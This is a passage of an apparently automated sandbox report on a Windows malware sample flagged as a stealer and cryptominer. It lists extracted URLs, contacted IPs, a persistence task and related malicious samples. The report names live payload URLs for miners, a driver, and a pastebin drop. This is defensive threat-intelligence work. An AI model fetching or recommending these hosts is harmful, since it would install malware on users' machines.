                                                https://citydisco.bet/gdJISresetupx 1.exe1.exe, 00000002.00000003.1082401555.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1108659728.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1113252451.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1081894496.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FCF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://duckduckgo.com/ac/?q=setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://contoso.com/Licensepowershell.exe, 0000000D.00000002.1243414678.0000000005EF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://aka.ms/pscore6lBLrpowershell.exe, 0000000D.00000002.1239270589.0000000004E91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://185.215.113.51/WinRing0x64.sysPZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.00000000030D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYisetupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://citydisco.bet/gdJISAAIAsetupx 1.exe1.exe, 00000002.00000003.1082401555.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1081894496.0000000000FCF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://citydisco.bet/Dsetupx 1.exe1.exe, 00000002.00000003.1152775702.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1182053990.0000000000FB9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://185.215.113.51/WatchDog.exeEhttp://185.215.113.51/lolMiner.exe?http://185.215.113.51/xmrig.exsetupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000000.1215296075.0000000000D32000.00000002.00000001.01000000.00000008.sdmp, ZHKYZWVTC38PGAWGZF49K.exe.2.drfalse
                                                              high
                                                              http://185.215.113.51/WatchDog.exePZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.00000000030D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.google.com/images/branding/product/ico/googleg_alldp.icosetupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://185.215.113.51/conhost.exe:setupx 1.exe1.exe, 00000002.00000002.2256041446.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308487060.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://185.215.113.51/WatchDogeesetupx 1.exe1.exe, 00000002.00000003.1308460293.000000000386A000.00000004.00000800.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2258316500.000000000386C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://185.215.113.51/Jsetupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256196112.0000000000FB9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://citydisco.bet/setupx 1.exe1.exe, 00000002.00000003.1152775702.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1081894496.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308962927.0000000000FC7000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1108659728.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1113377940.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256196112.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1182650520.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1139527382.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256410561.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1139805381.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1182053990.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1113252451.0000000000FB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://x1.c.lencr.org/0setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://x1.i.lencr.org/0setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://185.215.113.51/Dsetupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256196112.0000000000FB9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsetupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://contoso.com/powershell.exe, 0000000D.00000002.1243414678.0000000005EF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://nuget.org/nuget.exepowershell.exe, 0000000D.00000002.1243414678.0000000005EF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://185.215.113.51/Csetupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256196112.0000000000FB9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://support.mozilla.org/products/firefoxgro.allsetupx 1.exe1.exe, 00000002.00000003.1084005779.0000000003AF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000003064000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1239270589.0000000004E91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://185.215.113.51/lolMiner.exeZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000002F91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://citydisco.bet:443/gdJISsetupx 1.exe1.exe, 00000002.00000003.1081790283.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://citydisco.bet:443/gdJIS71025-5-setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://nuget.org/NuGet.exepowershell.exe, 0000000D.00000002.1243414678.0000000005EF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000D.00000002.1239270589.0000000004FE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000D.00000002.1239270589.0000000004FE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000D.00000002.1239270589.0000000004FE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://185.215.113.51/setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256196112.0000000000FB9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://185.215.113.51/conhost.exesetupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308909879.0000000000FCD000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256465217.0000000000FCE000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256041446.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308487060.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2255217438.0000000000ECB000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://contoso.com/Iconpowershell.exe, 0000000D.00000002.1243414678.0000000005EF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://ac.ecosia.org?q=setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://upx.sf.netAmcache.hve.6.drfalse
                                                                                                            high
                                                                                                            http://pastebin.comdZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000003078000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://ocsp.rootca1.amazontrust.com0:setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brsetupx 1.exe1.exe, 00000002.00000003.1084005779.0000000003AF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://github.com/Pester/Pesterpowershell.exe, 0000000D.00000002.1239270589.0000000004FE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://185.215.113.51ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.00000000030BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://crl.mipowershell.exe, 0000000D.00000002.1238344010.0000000003057000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://185.215.113.51/xmrig.exePZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.00000000030BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://www.ecosia.org/newtab/v20wsetupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://citydisco.bet/Vs16csetupx 1.exe1.exe, 00000002.00000003.1108659728.0000000000FA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://185.215.113.51DZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.00000000030D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://185.215.113.51/lolMiner.exe?http://185.215.113.51/xmrig.exesetupx 1.exe1.exe, 00000002.00000002.2256621404.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308250372.0000000000FED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: malware
                                                                                                                              unknown
                                                                                                                              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgsetupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://duckduckgo.com/chrome_newtabv20setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://citydisco.bet/gdJIS6setupx 1.exe1.exe, 00000002.00000002.2256041446.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308487060.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000D.00000002.1239270589.0000000004FE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&usetupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&ctasetupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgsetupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          http://pastebin.comZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000003078000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://pastebin.comZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000003071000.00000004.00000800.00020000.00000000.sdmp, ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000003064000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://gemini.google.com/app?q=setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://185.215.113.51/WinRing0x64.sysChttps://pastebin.com/raw/YpJeSRBCsetupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256621404.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308250372.0000000000FED000.00000004.00000020.00020000.00000000.sdmp, ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000000.1215296075.0000000000D32000.00000002.00000001.01000000.00000008.sdmp, ZHKYZWVTC38PGAWGZF49K.exe.2.drfalse
                                                                                                                                                    high
                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    188.114.97.3
                                                                                                                                                    citydisco.betEuropean Union
                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                    172.67.19.24
                                                                                                                                                    pastebin.comUnited States
                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                    185.215.113.51
                                                                                                                                                    unknownPortugal
                                                                                                                                                    206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                    Analysis ID:1637273
                                                                                                                                                    Start date and time:2025-03-13 13:32:24 +01:00
                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 7m 50s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                    Number of analysed new started processes analysed:34
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Sample name:setupx 1.exe1.exe
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal100.troj.spyw.evad.mine.winEXE@33/17@2/3
                                                                                                                                                    EGA Information:
                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 96%
                                                                                                                                                    • Number of executed functions: 18
                                                                                                                                                    • Number of non-executed functions: 141
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WerFault.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 40.69.147.202, 20.190.159.68, 4.175.87.197, 23.60.203.209, 172.202.163.200
                                                                                                                                                    • Excluded domains from analysis (whitelisted): onedsblobvmssprdcus02.centralus.cloudapp.azure.com, fs.microsoft.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                    TimeTypeDescription
                                                                                                                                                    08:33:38API Interceptor7x Sleep call for process: setupx 1.exe1.exe modified
                                                                                                                                                    08:33:42API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                    08:33:57API Interceptor11x Sleep call for process: powershell.exe modified
                                                                                                                                                    08:34:02API Interceptor17x Sleep call for process: ZHKYZWVTC38PGAWGZF49K.exe modified
                                                                                                                                                    13:34:03Task SchedulerRun new task: dllhost path: C:\ProgramData\Dllhost\dllhost.exe
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    188.114.97.3http://sg-adh7.vv.885210.xyz/Get hashmaliciousUnknownBrowse
                                                                                                                                                    • sg-adh7.vv.885210.xyz/favicon.ico
                                                                                                                                                    http://caixadirectasecdigital.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • caixadirectasecdigital.com/favicon.ico
                                                                                                                                                    PO NO 28950.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                    • www.tether1.xyz/focp/
                                                                                                                                                    RFQ- Italy.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                    • www.xploitation.net/sqjz/
                                                                                                                                                    Enquiry Quote - 21834-01.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                    • www.joeyvv.xyz/b80n/
                                                                                                                                                    DcbI6OM1wO.exeGet hashmaliciousLokibot, PureLog Stealer, zgRATBrowse
                                                                                                                                                    • ddrtot.shop/New/PWS/fre.php
                                                                                                                                                    kVPzMgJglW.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                    • www.timeinsardinia.info/j4nd/
                                                                                                                                                    tnZI8EzSx3.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                    • www.braposaldesk.cyou/3it7/
                                                                                                                                                    zzSk99EqY0.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                    • www.braposaldesk.cyou/3it7/
                                                                                                                                                    hh01FRs81x.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                    • www.serenityos.dev/dntg/?R4lxS2-P=Xi77pNpzRwduTXf13DwoRl9ks24bE/OoZO8jI9GlbI12YargANeHXOwJPk3kluRPu8INtGeEgdhJoy+Tym0P0ZbjUAApu4gNis/FV3kbZJq8JK1mGA==&LL=4FHLH
                                                                                                                                                    172.67.19.24rrats.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                    • pastebin.com/raw/KKpnJShN
                                                                                                                                                    sys_upd.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                                                                    cr_asm_menu..ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                                                                    cr_asm2.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                                                                    cr_asm_phshop..ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                                                                    VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                                                                    HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                                                                    xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                                                                    steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                                                                    cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    pastebin.comSteam.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                    • 104.20.3.235
                                                                                                                                                    Kiddion's Modest Menu v.1.0.0.exeGet hashmaliciousLummaC Stealer, XmrigBrowse
                                                                                                                                                    • 172.67.19.24
                                                                                                                                                    Venom.6.0.3.exeGet hashmaliciousXWormBrowse
                                                                                                                                                    • 172.67.19.24
                                                                                                                                                    svchost.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                    • 104.20.3.235
                                                                                                                                                    config.exeGet hashmaliciousXWormBrowse
                                                                                                                                                    • 104.20.3.235
                                                                                                                                                    nbtypsfikkad.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                    • 104.20.3.235
                                                                                                                                                    biopderfawd.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                    • 104.20.3.235
                                                                                                                                                    #Ud835#Udde6#Ud835#Uddd8#Ud835#Udde7#Ud835#Udde8#Ud835#Udde3.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 104.20.3.235
                                                                                                                                                    Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 104.20.4.235
                                                                                                                                                    q2e132qweertgd.exe.bin.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                    • 104.20.4.235
                                                                                                                                                    citydisco.betInstaller64x.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    setupx 2.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    ModMenu.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.97.3
                                                                                                                                                    SoftWare(2).exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.97.3
                                                                                                                                                    SoftWare(1).exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    Galaxy Swapper v2.0.3.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.97.3
                                                                                                                                                    13s1HMkHKv.exeGet hashmaliciousAmadey, DarkVision Rat, Fallen Miner, LummaC StealerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    SoftWare(1).exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.97.3
                                                                                                                                                    Kiddion's Modest Menu v.1.0.0.exeGet hashmaliciousLummaC Stealer, XmrigBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    Launcher_v2.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    CLOUDFLARENETUSInstaller64x.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    setupx 2.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    ModMenu.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.97.3
                                                                                                                                                    SoftWare(2).exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.97.3
                                                                                                                                                    SimpleLoader v2.1.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 172.67.144.37
                                                                                                                                                    SoftWare(1).exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    https://llttfr.boa.ink/?fr=gemma.inglis@heritageportfolio.co.ukGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.17.25.14
